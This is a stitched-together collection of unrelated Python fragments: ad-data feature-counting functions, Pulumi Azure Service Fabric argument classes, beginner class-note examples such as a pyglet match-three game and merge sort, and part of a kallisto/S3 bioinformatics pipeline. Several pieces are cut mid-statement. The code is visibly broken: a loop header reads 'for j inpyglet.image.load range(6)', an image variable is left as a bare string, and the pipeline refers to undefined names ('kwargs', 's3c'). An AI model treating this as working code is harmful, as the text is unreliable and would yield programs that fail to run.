def vector_feature_process(train_data, val_data, test2_data, begin_num, max_len, index_dict):
train_res = []
train_res2 = []
val_res2 = []
test2_res2 = []
train_rate = []
val_rate = []
test2_rate = []
for d in train_data:
lx = d.split(',')
row = [0] * max_len
row2 = [0] * max_len
if len(lx) > max_len or d == 'all':
j = 0
for i in index_dict:
if j >= max_len:
break
row[j] = index_dict[i]
j += 1
train_res.append(row)
row2 = [1] * max_len
train_res2.append(row2)
train_rate.append(1)
continue
for i, x in enumerate(lx):
if x not in index_dict:
x = '-1'
row[i] = index_dict[x]
row2[row[i]] = 1
train_res.append(row)
train_res2.append(row2)
train_rate.append(len(lx)/max_len)
val_res = []
for d in val_data:
lx = d.split(',')
row = [0] * max_len
row2 = [0] * max_len
if len(lx) > max_len or d == 'all':
j = 0
for i in index_dict:
if j >= max_len:
break
row[j] = index_dict[i]
j += 1
val_res.append(row)
row2 = [1] * max_len
val_res2.append(row2)
val_rate.append(1)
continue
for i, x in enumerate(lx):
if x not in index_dict:
x = '-1'
row[i] = index_dict[x]
row2[row[i]] = 1
val_res.append(row)
val_res2.append(row2)
val_rate.append(len(lx)/max_len)
test2_res = []
for d in test2_data:
lx = d.split(',')
row = [0] * max_len
row2 = [0] * max_len
if len(lx) > max_len or d == 'all':
j = 0
for i in index_dict:
if j >= max_len:
break
row[j] = index_dict[i]
j += 1
test2_res.append(row)
row2 = [1] * max_len
test2_res2.append(row2)
test2_rate.append(1)
continue
for i, x in enumerate(lx):
if x not in index_dict:
x = '-1'
row[i] = index_dict[x]
row2[row[i]] = 1
test2_res.append(row)
test2_res2.append(row2)
test2_rate.append(len(lx)/max_len)
return np.array(train_res), np.array(val_res), np.array(test2_res), index_dict,np.array(train_res2), np.array(val_res2), np.array(test2_res2),np.array(train_rate), np.array(val_rate), np.array(test2_rate),
def count_one_feature_times(train, val, test, fea, date):
count_dict = {}
val_res = []
test_res = []
train = pd.concat([train, val])
num1 = train[train['Reqday'] == '2_16'].shape[0]
num2 = train[train['Reqday'] == '3_19'].shape[0]
num3 = train.shape[0]
train_res = [-1] * num1
# 对2-17的数据进行统计,对2-16的数据进行赋值
train1 = train[train['Reqday'] == '2_17'][fea].values
for i,values in enumerate(train1):
if values not in count_dict:
count_dict[values] = 0
count_dict[values] += 1
if '-1' not in count_dict:
count_dict['-1'] = 1
train1 = train[train['Reqday'] == '2_16'][fea].values
for i, values in enumerate(train1):
if values not in count_dict:
values = '-1'
train_res.append(count_dict[values])
for i in range(len(date)-2):
count_dict = {}
day1 = date[i+2]
day2 = date[i+1]
day3 = date[i]
train_compute = train[train['Reqday'] == day1][fea].values
train1 = train[train['Reqday'] == day2]
train2 = train[train['Reqday'] == day3]
count_train = pd.concat([train1, train2])
count_train_data = count_train[fea].values
for values in count_train_data:
if values not in count_dict:
count_dict[values] = 0
count_dict[values] += 1
if '-1' not in count_dict:
count_dict['-1'] = 1
for values in train_compute:
if values not in count_dict:
values = '-1'
train_res.append(count_dict[values]/2)
train_res1 = train_res[:num3-num2]
val_res = train_res[-num2:]
count_dict = {}
train1 = train[train['Reqday'] == '3_18']
train2 = train[train['Reqday'] == '3_19']
count_train = pd.concat([train1, train2])
count_train_data = count_train[fea].values
for values in count_train_data:
if values not in count_dict:
count_dict[values] = 0
count_dict[values] += 1
if '-1' not in count_dict:
count_dict['-1'] = 1
for values in test:
if values not in count_dict:
values = '-1'
test_res.append(count_dict[values]/2)
# print(train_res1)
return np.array(train_res1), np.array(val_res), np.array(test_res)
def count_vector_feature_times(train, val, test, fea, date, flag):
count_dict = {}
val_res = []
test_res = None
train = pd.concat([train, val])
num1 = train[train['Reqday'] == '2_16'].shape[0]
num2 = train[train['Reqday'] == '3_19'].shape[0]
num3 = train.shape[0]
train_res = np.array([-1] * num1 * 2).reshape(num1, 2)
# 对2-16的数据进行统计,对2-17的数据进行赋值
train1 = train[train['Reqday'] == '2_16'][fea].values
for value in train1:
values = value.split(',')
for i in values:
if i not in count_dict:
count_dict[i] = 0
count_dict[i] += 1
if '-1' not in count_dict:
count_dict['-1'] = 1
train1 = train[train['Reqday'] == '2_17'][fea].values
for value in train1:
row = []
values = value.split(',')
for i in values:
if i not in count_dict:
i = '-1'
row.append(count_dict[i])
l = []
l.append(np.max(row))
l.append(np.mean(row))
train_res = np.row_stack((train_res, l))
for i in range(len(date)-2):
count_dict = {}
day1 = date[i+2]
day2 = date[i+1]
day3 = date[i]
train_compute = train[train['Reqday'] == day1][fea].values
train1 = train[train['Reqday'] == day2]
train2 = train[train['Reqday'] == day3]
count_train = pd.concat([train1, train2])
count_train_data = count_train[fea].values
for value in count_train_data:
valuess = value.split(',')
for values in valuess:
if values not in count_dict:
count_dict[values] = 0
count_dict[values] += 1
if '-1' not in count_dict:
count_dict['-1'] = 1
for value in train_compute:
row = []
values = value.split(',')
for i in values:
if i not in count_dict:
i = '-1'
row.append(count_dict[i])
l = []
l.append(max(row))
l.append(np.mean(row))
l = np.array(l)
train_res = np.row_stack((train_res, l/2))
train_res1 = train_res[:num3-num2]
val_res = train_res[-num2:]
count_dict = {}
test_flag = 1
train1 = train[train['Reqday'] == '3_18']
train2 = train[train['Reqday'] == '3_19']
count_train = pd.concat([train1, train2])
count_train_data = count_train[fea].values
for value in count_train_data:
valuess = value.split('-1')
for values in valuess:
if values not in count_dict:
count_dict[values] = 0
count_dict[values] += 1
if '-1' not in count_dict:
count_dict['-1'] = 1
print(test.shape)
for value in test:
row = []
valuess = value.split(',')
for values in valuess:
if values not in count_dict:
values = '-1'
row.append(count_dict[values])
l = []
l.append(max(row))
l.append(np.mean(row))
l = np.array(l)
if test_flag == 1:
test_flag = 0
test_res = l/2
else:
test_res = np.row_stack((test_res, l/2))
print(test_res)
return np.array(train_res1), np.array(val_res), np.array(test_res)
def one_feature_exposure(train, val, test, fea, date):
# 返回曝光的最大值,最小值,均值,中位数四个值,
# 返回bid的最大值,最小值,均值,中位数四个值,
val_res = []
test_res = []
train_res = []
val_res2 = []
test_res2 = []
train_res2 = []
train_res3 = []
Train = pd.concat([train, val])
num1 = train[train['Reqday'] == '2_16'].shape[0]
for i in range(num1):
train_res.append([8, 8, 8, 8])
train_res2.append([8, 8, 8, 8])
train_count = train[train['Reqday'] == '2_16']
train_compute = train[train['Reqday'] == '2_17']
exposure_dict = {}
bid_dict = {}
for value in train_count[fea].values:
if value not in exposure_dict:
train1 = train_count[train_count[fea] == value]['exposure'].values
exposure_dict[value] = []
bid_dict[value] = []
exposure_dict[value].append(np.max(train1))
exposure_dict[value].append(np.min(train1))
exposure_dict[value].append(np.mean(train1))
exposure_dict[value].append(np.median(train1))
train2 = train_count[train_count[fea] == value]['adBid'].values
bid_dict[value].append(np.max(train2))
bid_dict[value].append(np.min(train2))
bid_dict[value].append(np.mean(train2))
bid_dict[value].append(np.median(train2))
if '-1' not in exposure_dict:
exposure_dict['-1'] = [8, 8, 8, 8]
bid_dict['-1'] = [8, 8, 8, 8]
for value in train_compute[fea].values:
if value not in exposure_dict:
value = '-1'
train_res.append(exposure_dict[value])
train_res2.append(bid_dict[value])
for i in range(len(date) - 2):
day1 = date[i+2]
day2 = date[i+1]
day3 = date[i]
train1 = Train[Train['Reqday'] == day3]
train2 = Train[Train['Reqday'] == day2]
train_compute = Train[Train['Reqday'] == day1]
train_count = pd.concat([train1, train2])
exposure_dict = {}
bid_dict = {}
for value in train_count[fea].values:
if value not in exposure_dict:
exposure_dict[value] = []
bid_dict[value] = []
train1 = train_count[train_count[fea] == value]['exposure'].values
exposure_dict[value].append(np.max(train1))
exposure_dict[value].append(np.min(train1))
exposure_dict[value].append(np.mean(train1))
exposure_dict[value].append(np.median(train1))
train2 = train_count[train_count[fea] == value]['adBid'].values
bid_dict[value].append(np.max(train2))
bid_dict[value].append(np.min(train2))
bid_dict[value].append(np.mean(train2))
bid_dict[value].append(np.median(train2))
if '-1' not in exposure_dict:
exposure_dict['-1'] = [8, 8, 8, 8]
bid_dict['-1'] = [8, 8, 8, 8]
for value in train_compute[fea].values:
if value not in exposure_dict:
value = '-1'
train_res.append(exposure_dict[value])
train_res2.append(bid_dict[value])
train_res1 = train_res[:(Train.shape[0] - val.shape[0])]
val_res = | |
placement policy for a service fabric service. Following are the possible values.
Expected value is 'PreferredPrimaryDomain'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ServicePlacementRequireDomainDistributionPolicyArgs:
def __init__(__self__, *,
domain_name: pulumi.Input[str],
type: pulumi.Input[str]):
"""
Describes the policy to be used for placement of a Service Fabric service where two replicas
from the same partition should never be placed in the same fault or upgrade domain.
While this is not common it can expose the service to an increased risk of concurrent failures
due to unplanned outages or other cases of subsequent/concurrent failures. As an example, consider
a case where replicas are deployed across different data center, with one replica per location.
In the event that one of the datacenters goes offline, normally the replica that was placed in that
datacenter will be packed into one of the remaining datacenters. If this is not desirable then this
policy should be set.
:param pulumi.Input[str] domain_name: The name of the domain that should used for placement as per this policy.
:param pulumi.Input[str] type: The type of placement policy for a service fabric service. Following are the possible values.
Expected value is 'RequiredDomainDistribution'.
"""
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "type", 'RequiredDomainDistribution')
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The name of the domain that should used for placement as per this policy.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The type of placement policy for a service fabric service. Following are the possible values.
Expected value is 'RequiredDomainDistribution'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ServicePlacementRequiredDomainPolicyArgs:
def __init__(__self__, *,
domain_name: pulumi.Input[str],
type: pulumi.Input[str]):
"""
Describes the policy to be used for placement of a Service Fabric service where the instances or replicas of that service must be placed in a particular domain.
:param pulumi.Input[str] domain_name: The name of the domain that should used for placement as per this policy.
:param pulumi.Input[str] type: The type of placement policy for a service fabric service. Following are the possible values.
Expected value is 'RequiredDomain'.
"""
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "type", 'RequiredDomain')
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The name of the domain that should used for placement as per this policy.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The type of placement policy for a service fabric service. Following are the possible values.
Expected value is 'RequiredDomain'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ServiceTypeHealthPolicyArgs:
def __init__(__self__, *,
max_percent_unhealthy_partitions_per_service: pulumi.Input[int],
max_percent_unhealthy_replicas_per_partition: pulumi.Input[int],
max_percent_unhealthy_services: pulumi.Input[int]):
"""
Represents the health policy used to evaluate the health of services belonging to a service type.
:param pulumi.Input[int] max_percent_unhealthy_partitions_per_service: The maximum allowed percentage of unhealthy partitions per service.
The percentage represents the maximum tolerated percentage of partitions that can be unhealthy before the service is considered in error.
If the percentage is respected but there is at least one unhealthy partition, the health is evaluated as Warning.
The percentage is calculated by dividing the number of unhealthy partitions over the total number of partitions in the service.
The computation rounds up to tolerate one failure on small numbers of partitions.
:param pulumi.Input[int] max_percent_unhealthy_replicas_per_partition: The maximum allowed percentage of unhealthy replicas per partition.
The percentage represents the maximum tolerated percentage of replicas that can be unhealthy before the partition is considered in error.
If the percentage is respected but there is at least one unhealthy replica, the health is evaluated as Warning.
The percentage is calculated by dividing the number of unhealthy replicas over the total number of replicas in the partition.
The computation rounds up to tolerate one failure on small numbers of replicas.
:param pulumi.Input[int] max_percent_unhealthy_services: The maximum allowed percentage of unhealthy services.
The percentage represents the maximum tolerated percentage of services that can be unhealthy before the application is considered in error.
If the percentage is respected but there is at least one unhealthy service, the health is evaluated as Warning.
This is calculated by dividing the number of unhealthy services of the specific service type over the total number of services of the specific service type.
The computation rounds up to tolerate one failure on small numbers of services.
"""
pulumi.set(__self__, "max_percent_unhealthy_partitions_per_service", max_percent_unhealthy_partitions_per_service)
pulumi.set(__self__, "max_percent_unhealthy_replicas_per_partition", max_percent_unhealthy_replicas_per_partition)
pulumi.set(__self__, "max_percent_unhealthy_services", max_percent_unhealthy_services)
@property
@pulumi.getter(name="maxPercentUnhealthyPartitionsPerService")
def max_percent_unhealthy_partitions_per_service(self) -> pulumi.Input[int]:
"""
The maximum allowed percentage of unhealthy partitions per service.
The percentage represents the maximum tolerated percentage of partitions that can be unhealthy before the service is considered in error.
If the percentage is respected but there is at least one unhealthy partition, the health is evaluated as Warning.
The percentage is calculated by dividing the number of unhealthy partitions over the total number of partitions in the service.
The computation rounds up to tolerate one failure on small numbers of partitions.
"""
return pulumi.get(self, "max_percent_unhealthy_partitions_per_service")
@max_percent_unhealthy_partitions_per_service.setter
def max_percent_unhealthy_partitions_per_service(self, value: pulumi.Input[int]):
pulumi.set(self, "max_percent_unhealthy_partitions_per_service", value)
@property
@pulumi.getter(name="maxPercentUnhealthyReplicasPerPartition")
def max_percent_unhealthy_replicas_per_partition(self) -> pulumi.Input[int]:
"""
The maximum allowed percentage of unhealthy replicas per partition.
The percentage represents the maximum tolerated percentage of replicas that can be unhealthy before the partition is considered in error.
If the percentage is respected but there is at least one unhealthy replica, the health is evaluated as Warning.
The percentage is calculated by dividing the number of unhealthy replicas over the total number of replicas in the partition.
The computation rounds up to tolerate one failure on small numbers of replicas.
"""
return pulumi.get(self, "max_percent_unhealthy_replicas_per_partition")
@max_percent_unhealthy_replicas_per_partition.setter
def max_percent_unhealthy_replicas_per_partition(self, value: pulumi.Input[int]):
pulumi.set(self, "max_percent_unhealthy_replicas_per_partition", value)
@property
@pulumi.getter(name="maxPercentUnhealthyServices")
def max_percent_unhealthy_services(self) -> pulumi.Input[int]:
"""
The maximum allowed percentage of unhealthy services.
The percentage represents the maximum tolerated percentage of services that can be unhealthy before the application is considered in error.
If the percentage is respected but there is at least one unhealthy service, the health is evaluated as Warning.
This is calculated by dividing the number of unhealthy services of the specific service type over the total number of services of the specific service type.
The computation rounds up to tolerate one failure on small numbers of services.
"""
return pulumi.get(self, "max_percent_unhealthy_services")
@max_percent_unhealthy_services.setter
def max_percent_unhealthy_services(self, value: pulumi.Input[int]):
pulumi.set(self, "max_percent_unhealthy_services", value)
@pulumi.input_type
class SettingsParameterDescriptionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
value: pulumi.Input[str]):
"""
Describes a parameter in fabric settings of the cluster.
:param pulumi.Input[str] name: The parameter name of fabric setting.
:param pulumi.Input[str] value: The parameter value of fabric setting.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The parameter name of fabric setting.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The parameter value of fabric setting.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class SettingsSectionDescriptionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]):
"""
Describes a section in the fabric settings of the cluster.
:param pulumi.Input[str] name: The section name of the fabric settings.
:param pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]] parameters: The collection of parameters in the section.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The section name of the fabric settings.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]:
"""
The collection of parameters in the section.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class SingletonPartitionSchemeArgs:
def __init__(__self__, *,
partition_scheme: pulumi.Input[str]):
"""
Describes the partition scheme of a singleton-partitioned, or non-partitioned service.
:param pulumi.Input[str] partition_scheme: Enumerates the ways that a service can be partitioned.
Expected value is 'Singleton'.
"""
pulumi.set(__self__, "partition_scheme", 'Singleton')
@property
@pulumi.getter(name="partitionScheme")
def partition_scheme(self) -> pulumi.Input[str]:
"""
Enumerates the ways that a service can be partitioned.
Expected value is 'Singleton'.
"""
return pulumi.get(self, "partition_scheme")
@partition_scheme.setter
def partition_scheme(self, value: | |
<reponame>jlmucb/class_notes<filename>IoT/code/py/p3.py
def calc_miles(gallons, mpg=20.0):
return gallons*mpg
print( calc_miles(10.0, 15.0) )
print( calc_miles(10.0) )
for line in infile:
#STUFF DELETED HERE
m, d, y = date.split('/')
month = int(m)
day = int(d)
year = int(y)
#Put data into list
datalist.append([day, month, year, lowtemp, hightemp,
rainfall])
#STUFF DELETED HERE
#Find historical data for date
gooddata = []
for singleday in datalist:
if (singleday[0] == month) and (singleday[1] == day):
gooddata.append([singleday[2], singleday[3],
singleday[4], singleday[5]])
from random import choice
import pyglet
window = pyglet.window.Window(width=400, height = 450,
caption="GameWindow")
Im1 = pyglet.image.load('BlueTri.jpg')
Im2 = pyglet.image.load('PurpleStar.jpg')
Im3 = ('OrangeDiamond.jpg')
Im4 = pyglet.image.load('YellowCircle.jpg')
Im5 = pyglet.image.load('RedHex.jpg')
def InitializeGrid(board):
#Initialize Grid by reading in from file
for i in range(8):
for j in range(8):
board[i][j] = choice(['A', 'B', 'C', 'D', 'E'])
def Initialize(board):
#Initialize game
#Initialize grid
InitializeGrid(board)
#Initialize score
global score
score = 0
#Initialize turn number
global turn
turn = 1
#Set up graphical info
def ContinueGame(current_score, goal_score = 100):
#Return false if game should end, true if game is not over
if (current_score >= goal_score):
return False
else:
return True
def SwapPieces(board, move):
#Swap objects in two positions
temp = board[move[0]][move[1]]
board[move[0]][move[1]] = board[move[2]][move[3]]
board[move[2]][move[3]] = temp
def RemovePieces(board):
#Remove 3-in-a-row and 3-in-a-column pieces
#Create board to store remove-or-not
remove = [[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0,
0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0,
0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]]
#Go through rows
for i in range(8):
for j inpyglet.image.load range(6):
if (board[i][j] == board[i][j+1]) and (board[i][j] ==
board[i][j+2]):
#three in a row are the same!
remove[i][j] = 1;
remove[i][j+1] = 1;
remove[i][j+2] = 1;
#Go through columns
for j in range(8):
for i in range(6):
if (board[i][j] == board[i+1][j]) and (board[i][j] ==
board[i+2][j]):
#three in a row are the same!
remove[i][j] = 1;
remove[i+1][j] = 1;
remove[i+2][j] = 1;
#Eliminate those marked
global score
removed_any = False
for i in range(8):
for j in range(8):
if remove[i][j] == 1:
board[i][j] = 0
score += 1
removed_any = True
return removed_any
def DropPieces(board):
#Drop pieces to fill in blanks
for j in range(8):
#make list of pieces in the column
listofpieces = []
for i in range(8):
if board[i][j] != 0:
listofpieces.append(board[i][j])
#copy that list into colulmn
for i in range(len(listofpieces)):
board[i][j] = listofpieces[i]
#fill in remainder of column with 0s
for i in range(len(listofpieces), 8):
board[i][j] = 0
def FillBlanks(board):
#Fill blanks with random pieces
for i in range(8):
for j in range(8):
if (board[i][j] == 0):
board[i][j] = choice(['A', 'B', 'C', 'D', 'E'])
def Update(board, move):
#Update the board according to move
SwapPieces(board, move)
pieces_eliminated = True
while pieces_eliminated:
pieces_eliminated = RemovePieces(board)
DropPieces(board)
FillBlanks(board)
@window.event
def on_draw():
window.clear()
for i in range(7,-1,-1):
#Draw each row
y = 50+50*i
for j in range(8):
#draw each piece, first getting position
x = 50*j
if board[i][j] == 'A':
Im1.blit(x,y)
elif board[i][j] == 'B':
Im2.blit(x,y)
elif board[i][j] == 'C':
Im3.blit(x,y)
elif board[i][j] == 'D':
Im4.blit(x,y)
elif board[i][j] == 'E':
Im5.blit(x,y)
label = pyglet.text.Label('Turn: '+str(turn)+
'Score: '+str(score), font_name='Arial', font_size=18, x=20,
y = 10)
label.draw()
@window.event
def on_mouse_press(x, y, button, modifiers):
#Get the starting cell
global startx
global starty
startx = x
starty = y
@window.event
def on_mouse_release(x, y, button, modifiers):
#Get starting and ending cell and see if they are adjacent
startcol = startx//50
startrow = (starty-50)//50
endcol = x//50
endrow = (y-50)//50
#Check whether ending is adjacent to starting and if so,
make move.
if ((startcol==endcol and startrow==endrow - 1)
or (startcol==endcol and startrow==endrow+1) or
(startrow==endrow and startcol==endcol-1) or
(startrow==endrow and startcol==endcol+1)):
Update(board,[startrow,startcol,endrow,endcol])
global turn
turn += 1
#See if game is over
if not ContinueGame(score):
print("You won in", turn, "turns!")
exit()
#State main variables
score = 100
turn = 100
goalscore = 100
board = [[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]]
#Initialize game
Initialize(board)
pyglet.app.run()
from matplotlib import pyplot
pyplot.plot([0,1,2,3,4,5], [0,1,4,9,16,25])
pyplot.axis([0,5,0,25])
pyplot.show()
from matplotlib.pyplot import plot, show
#Set initial conditions
time = 0
balance = 1000
#Set list to store data
timelist=[time]
balancelist=[balance]
while (time < 10):
#Increase balance and time
balance += balance*0.03
time += 1
#Store time and balance in lists
timelist.append(time)
balancelist.append(balance)
#Output the simulation results
for i in range(len(timelist)):
print("Year:", timelist[i], " Balance:", balancelist[i])
plot(timelist, balancelist)
show()
class BankAccount:
balance = 0.0
def __init__(self):
self.deposits = []
checking_account = BankAccount()
savings_account = BankAccount()
checking_account.deposits.append(100.0)
print(savings_account.deposits)
class FootballPlayer:
name = "<NAME>"
team = "None"
years_in_league = 0
def printPlayer(self):
print(self.name+" playing for the "+self.team+":")
class Quarterback(FootballPlayer):
pass_attempts = 0
completions = 0
pass_yards = 0
def completionRate(self):
return self.completions/self.pass_attempts
def yardsPerAttempt(self):
return self.pass_yards/self.pass_attempts
class RunningBack(FootballPlayer):
rushes = 0
rush_yards = 0
def yardsPerRush(self):
return self.rush_yards/self.rushes
class FootballPlayer:
name = "<NAME>"
team = "None"
years_in_league = 0
def printPlayer(self):
print(self.name+" playing for the "+self.team+":")
def isGood(self):
print("Error! isGood is not defined!")
return False
class Quarterback(FootballPlayer):
pass_attempts = 0
completions = 0
pass_yards = 0
def completionRate(self):
return self.completions/self.pass_attempts
def yardsPerAttempt(self):
return self.pass_yards/self.pass_attempts
def isGood(self):
return (self.yardsPerAttempt() > 7)
class RunningBack(FootballPlayer):
rushes = 0
rush_yards = 0
def yardsPerRush(self):
return self.rush_yards/self.rushes
def isGood(self):
return (self.yardsPerRush() > 4)
book_queue = []
book_queue.append(medium_book)
book_queue.append(short_book)
book_queue.append(long_book)
next_book = book_queue.pop(0)
def isIn(L, v): i= 0
while (i<len(L)):
if L[i] == v:
return True
else:
i += 1
return False
favorite_foods = ['pizza', 'barbeque', 'gumbo', 'chicken and
dumplings', 'pecan pie', 'ice cream']
print(isIn(favorite_foods, 'gumbo'))
print(isIn(favorite_foods, 'coconut'))
OUTPUT:
True
False
def mergeSort(L):
n = len(L)
if n <= 1:
return
L1 = L[:n//2]
L2 = L[n//2:]
mergeSort(L1)
mergeSort(L2)
merge(L, L1, L2)
return
def merge(L, L1, L2):
i= 0
j= 0
k= 0
while (j < len(L1)) or (k < len(L2)):
if j < len(L1):
if k < len(L2):
#we are not at the end of L1 or L2, so pull the smaller value
if L1[j] < L2[k]:
L[i] = L1[j]
j += 1
else:
L[i] = L2[k]
k += 1
else:
#we are at the end of L2, so just pull from L1
L[i] = L1[j]
j += 1
else:
#we are at the end of L1, so just pull from L2
L[i] = L2[k]
k += 1
i += 1
return
def merge(L, L1, L2):
i= 0
j= 0
k= 0
while (j < len(L1)) or (k < len(L2)):
if j < len(L1):
if k < len(L2):
#we are not at the end of L1 or L2, so pull the
smaller value
if L1[j] < L2[k]:
L[i] = L1[j]
j += 1
else:
L[i] = L2[k]
k += 1
else:
#we are at the end of L2, so just pull from L1
L[i] = L1[j]
j += 1
else:
#we are at the end of L1, so just pull from L2
L[i] = L2[k]
k += 1
i += 1
return
class node:
def __init__(self, name, parent=-1):
self._name = name
self._parent = parent
self._left = -1
self._right = -1
def getName(self):
return self._name
def getParent(self):
return self._parent
def getLeft(self):
return self._left
def getRight(self):
return self._right
def setParent(self, p):
self._parent = p
def setLeft(self, l):
self._left = l
def setRight(self, r):
self._right = r
class node:
def __init__(self, name):
self._name = name
self._friends = []
self._status = 0
self._discoveredby = 0
def getName(self):
return self._name
def getFriends(self):
return self._friends
def addFriend(self, friend_index):
self._friends.append(friend_index)
def isUnseen(self):
if self._status == 0:
return True
else:
return False
def isSeen(self):
if self._status == 1:
return True
| |
#!/usr/bin/env python
import argparse
import datetime
import os
import pathlib
import posixpath
import re
import subprocess
import tarfile
import time
import sys
import shutil
import glob
from collections import defaultdict
import utilities.log_util as ut_log
import utilities.s3_util as s3u
import boto3
from boto3.s3.transfer import TransferConfig
def get_default_requirements():
return argparse.Namespace(vcpus=16, memory=64000, storage=500, ecr_image="velocyto")
def display_info(logger):
"""Displays kb, kallisto and bustools version + citation information, along
with a brief description and examples.
Keyword Argument:
mainlogger - Logger of main function (type: logging.Logger)
"""
info_command = ["kb", "info"]
# if ut_log.log_command(
# logger,
# info_command,
# stdout=subprocess.PIPE,
# stderr=subprocess.STDOUT,
# shell=True,
# ):
# logger.info("Failed to view kb_python package details")
# sys.exit(1)
proc = subprocess.run(" ".join(info_command), **kwargs)
if proc.returncode != 0:
raise RuntimeError("`info` command failed")
if proc.stdout and isinstance(proc.stdout, str):
raise RuntimeError(proc.stdout)
elif isinstance(proc.stdout, bytes):
raise RuntimeError(proc.stdout.decode())
return True
else:
return False
def display_technologies(logger):
"""Displays a list of supported technologies along with whether kb provides
a whitelist for that technology and the FASTQ argument order for kb count.
Keyword Argument:
mainlogger - Logger of main function (type: logging.Logger)
"""
technology_command = ["kb", "--list"]
if ut_log.log_command(
logger,
technology_command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
):
logger.info(
"Failed to view single-cell technology list compatible with the kb_python package"
)
sys.exit(1)
# proc = subprocess.run(" ".join(technology_command), **kwargs)
# if proc.returncode != 0:
# raise RuntimeError("`--list` command failed")
# if proc.stdout and isinstance(proc.stdout, str):
# raise RuntimeError(proc.stdout)
# elif isinstance(proc.stdout, bytes):
# raise RuntimeError(proc.stdout.decode())
# return True
# else:
# return False
def parse_ref(args, run_dir, logger):
"""Parser for the `ref` command. Build kallisto index files.
Keyword Arguments:
args -- Command-line arguments dictionary, as parsed by argparse (type: dict)
run_dir -- Path on the EC2 instance under which jobs are run (type: pathlib.Path)
logger -- Logger object that exposes the interface the code directly uses (type: logging.Logger)
"""
# Build paths on the EC2 instance to store inputs and outputs of kallisto index building. Download kallisto index building files from the AWS S3 bucket to the EC2 instance, if not using the in-built kallisto indices
kallisto_index_dir = run_dir / "kallisto_index"
kallisto_index_inputs = kallisto_index_dir / "inputs"
kallisto_index_outputs = kallisto_index_dir / "outputs"
kallisto_index_inputs.mkdir(parents=True)
kallisto_index_outputs.mkdir(parents=True)
kb_ref_paths = dict()
s3_kb_ref = dict()
kb_ref_output_to_s3 = dict()
if "-d" not in sys.argv:
if "--workflow" in sys.argv and "kite" in sys.argv:
kb_ref_paths["feature_path"] = kallisto_index_inputs / os.path.basename(
args.feature
)
(
s3_kb_ref["s3_feature_bucket"],
s3_kb_ref["s3_feature_prefix"],
) = s3u.s3_bucket_and_key(args.feature)
s3c.download_file(
Bucket=s3_kb_ref["s3_feature_bucket"],
Key=s3_kb_ref["s3_feature_prefix"],
Filename=str(kb_ref_paths["feature_path"]),
)
for arg in ["fasta", "gtf"]:
kb_ref_paths[arg + "_path"] = kallisto_index_inputs / os.path.basename(
getattr(args, arg)
)
(
s3_kb_ref["s3_" + arg + "_bucket"],
s3_kb_ref["s3_" + arg + "_prefix"],
) = s3u.s3_bucket_and_key(getattr(args, arg))
s3c.download_file(
Bucket=s3_kb_ref["s3_" + arg + "_bucket"],
Key=s3_kb_ref["s3_" + arg + "_prefix"],
Filename=str(kb_ref_paths[arg + "_path"]),
)
for arg in ["-i", "-g", "-f1", "-f2", "-c1", "-c2", "--tmp"]:
if arg in sys.argv:
arg = arg[2:] if arg == "--tmp" else arg[1:]
print(
f"testing purpose - see if getattr(args, arg) output all argument names from '-i', '-g', '-f1', '-f2', '-c1', '-c2', '--tmp': {getattr(args, arg)}"
) # testing purpose
if arg == "tmp":
kb_ref_paths[arg + "_path"] = kallisto_index_dir / "alter_tmp"
s3_kb_ref["s3_" + arg + "_bucket"] = s3u.s3_bucket_and_key(
getattr(args, arg)
)[0]
